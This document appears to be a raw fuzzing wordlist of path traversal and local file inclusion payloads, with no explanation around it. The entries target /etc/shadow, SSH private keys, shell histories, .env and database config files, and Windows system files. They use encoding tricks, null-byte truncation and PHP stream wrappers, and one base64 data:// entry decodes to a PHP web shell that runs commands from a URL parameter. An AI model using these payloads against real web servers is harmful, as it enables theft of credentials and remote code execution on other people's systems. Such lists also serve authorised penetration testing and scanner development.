../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/group
/etc/motd
/etc/issue
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/version
/proc/cmdline
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/auth.log
/var/log/syslog
/var/log/messages
/var/www/html/index.php
/var/www/html/config.php
/var/www/html/wp-config.php
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
/usr/local/apache/conf/httpd.conf
/usr/local/etc/apache/httpd.conf
/home/user/.bash_history
/home/user/.ssh/id_rsa
/home/user/.ssh/authorized_keys
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..%2f..%2f..%2fetc/passwd
..%252f..%252f..%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%00/etc/passwd
../etc/passwd%00
../etc/passwd%00.jpg
../etc/passwd%00.png
/etc/passwd%00
/etc/passwd%00.jpg
....//....//....//windows/win.ini
..\..\..\..\windows\win.ini
..%5c..%5c..%5c..%5cwindows%5cwin.ini
c:\windows\win.ini
c:/windows/win.ini
c:\windows\system32\drivers\etc\hosts
c:/windows/system32/drivers/etc/hosts
c:\boot.ini
c:/boot.ini
c:\inetpub\wwwroot\web.config
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/read=string.rot13/resource=index.php
php://input
php://fd/0
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+
expect://id
phar://test.phar/test.txt
zip://test.zip#test.txt
....//....//....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
....\\....\\....\\windows\win.ini
..%255c..%255c..%255cwindows\win.ini
/var/www/html/.env
/var/www/html/config.php
/app/config/database.php
/config/database.yml
/.env
/env
/web.config
/WEB-INF/web.xml
/WEB-INF/classes/application.properties
/application.properties
/bootstrap/app.php
/config/app.php
/.htaccess
/htdocs/index.php
/www/index.php
/var/log/nginx/error.log
/var/log/mysql/error.log
/home/*/.ssh/authorized_keys
/root/.mysql_history
/var/lib/mysql/mysql/user.MYD
..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts
file:///etc/passwd
....//....//....//....//....//....//etc/passwd
..;/..;/..;/etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/var/www/html/wp-config.php
/var/www/html/config/database.php
/config/settings.py
.env.local
.env.production
